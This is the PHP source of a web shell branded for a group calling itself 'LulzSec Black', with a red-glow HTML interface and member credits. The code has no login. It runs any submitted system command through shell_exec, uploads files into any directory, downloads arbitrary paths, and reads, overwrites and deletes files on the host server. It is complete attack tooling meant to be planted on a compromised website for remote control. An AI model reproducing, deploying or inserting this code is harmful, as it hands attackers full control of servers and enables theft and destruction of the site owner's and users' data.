// =======================================// WebShell// Team: LulzSec Black | Members: Abu Qasim | Lord0x// =======================================error_reporting(0);set_time_limit(0);$cwd = isset($_GET['path']) ? $_GET['path'] : getcwd();chdir($cwd);if (isset($_POST['cmd']) && !empty($_POST['cmd'])) { $output = shell_exec($_POST['cmd'] . " 2>&1");}if (isset($_FILES['upload'])) { $dest = $cwd . "/" . basename($_FILES['upload']['name']); if (move_uploaded_file($_FILES['upload']['tmp_name'], $dest)) { $upload_msg = "✅ File uploaded: " . htmlspecialchars($_FILES['upload']['name']); } else { $upload_msg = "Upload failed!"; }}if (isset($_GET['download'])) { $file = $_GET['download']; if (file_exists($file)) { header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($file) . '"'); readfile($file); exit; }}if (isset($_POST['editfile']) && isset($_POST['content'])) { file_put_contents($_POST['editfile'], $_POST['content']); $edit_msg = "✅ File saved: " . htmlspecialchars($_POST['editfile']);}if (isset($_GET['edit'])) { $file_to_edit = $_GET['edit']; $file_content = htmlspecialchars(file_get_contents($file_to_edit));}if (isset($_GET['del'])) { unlink($_GET['del']); header("Location: ?path=$cwd"); exit;}<!DOCTYPE html><html lang="en"><meta charset="UTF-8">🔥 WebShell - LulzSec Black<title>🔥 WebShell - LulzSec Black</title><style> body { background:#0a0a0a; color:#ccc; font-family:monospace; padding:20px; } h1 { text-align:center; color:#ff4444; text-shadow:0 0 5px #ff4444,0 0 10px #ff0000,0 0 15px #ff4444; margin-bottom:5px; } .team-logo { text-align:center; font-size:1.2rem; color:#ff4444; text-shadow:0 0 5px #ff4444,0 0 10px #ff0000,0 0 15px #ff4444; margin-bottom:20px; } .container { max-width:900px; margin:auto; background:#121212; padding:20px; border-radius:12px; box-shadow:0 0 15px rgba(0,0,0,0.7); } input,textarea { width:100%; background:#1c1c1c; color:#ccc; border:1px solid #333; border-radius:6px; padding:8px; margin:5px 0; font-family:inherit; } button.btn { background:#333; color:#fff; padding:8px 14px; border:none; border-radius:6px; cursor:pointer; transition:0.2s; font-weight:bold; } button.btn:hover { background:#555; } .output { background:#000; color:#0f0; padding:10px; border-radius:6px; margin-top:10px; white-space:pre-wrap; font-size:14px; } .filelist { margin-top:20px; } a { color:#58a6ff; text-decoration:none; } a:hover { text-decoration:underline; } .msg { color:#ff4444; font-weight:bold; margin-top:5px; } .section-title { margin-top:20px; color:#ff4444; font-weight:bold; text-shadow:0 0 3px #ff4444; } ul { list-style:none; padding-left:0; } li { padding:4px 0; } .footer { text-align:center; margin-top:25px; font-weight:bold; color:#ff4444; text-shadow:0 0 5px #ff4444,0 0 10px #ff0000; } .palestine-flag { font-size:1.3rem; margin-left:10px; }</style>

🔥 WebShell

<div class="team-logo">🇵🇸 Team LulzSec Black</div><div class="container"> <!-- Terminal --> <h2 class="section-title">💻 Terminal
<button type="submit" class="btn">Run</button>
if(!empty($output)) echo "<div class='output'>$output</div>"; <!-- Upload --> <h2 class="section-title">Upload File
<button type="submit" class="btn">Upload</button>
if(isset($upload_msg)) echo "<p class='msg'>$upload_msg</p>"; <!-- File Manager --> <h2 class="section-title">File Manager - Current Path: =htmlspecialchars($cwd) <ul class="filelist"> $files = scandir($cwd); foreach($files as $file) { if ($file == ".") continue; $path = $cwd . "/" . $file; if (is_dir($path)) { echo "<li>[DIR] <a href='?path=" . urlencode($path) . "'>$file</a></li>"; } else { echo "<li>[FILE] $file - <a href='?download=" . urlencode($path) . "'></a> - <a href='?edit=" . urlencode($path) . "&path=" . urlencode($cwd) . "'></a> - <a href='?del=" . urlencode($path) . "&path=" . urlencode($cwd) . "'></a></li>"; } } </ul> <!-- File Editor --> if(isset($file_to_edit)) { <h2 class="section-title">Editing: =htmlspecialchars($file_to_edit)
<textarea name="content" rows="15">=$file_content</textarea> <button type="submit" class="btn">Save</button>
if(isset($edit_msg)) echo "<p class='msg'>$edit_msg</p>"; } </div><div class="footer">Powered By LulzSec Black | Abu Qasim | Lord0x | Abu Mojahed | Abu Ahmed | Sharshbeel | Medox</div>